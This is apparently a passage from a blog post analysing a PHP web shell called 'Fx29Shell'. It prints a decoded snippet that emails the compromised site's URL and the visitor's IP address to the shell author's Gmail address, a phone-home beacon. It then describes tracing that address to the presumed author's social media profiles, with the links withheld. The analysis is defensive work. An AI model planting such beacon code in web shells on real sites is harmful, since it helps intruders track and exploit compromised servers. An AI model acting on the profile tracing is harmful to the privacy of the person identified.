We have one more to decode, $shell_data
$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$body = "Boss, there was an injected target on $target by $visitor";
@mail("xxxxxx@gmail.com","Fx29Shell http://$target by $visitor", "$body");
} else {
$visitcount;
}
setcookie("visits",$visitcount);"
Good to know it phones home.
Well there is a few more places that mention that address, and what’s really interesting is that this guy appears to have his account on freindster.
http://profiles.friendster.com/xxxxxx
I am pretty certian that this is the guy, but it would not be nice to share this information. Kinda odd that he would use his real email address, maybe it’s an old one that he forgot was on freindster and out on the internets.
Humm, it also has another email address on his profile, it has a facebook account!
http://facebook.com/XXXXXXXX
Well that awesome, but what do you do with it?
(And there is a reason I did not post the links)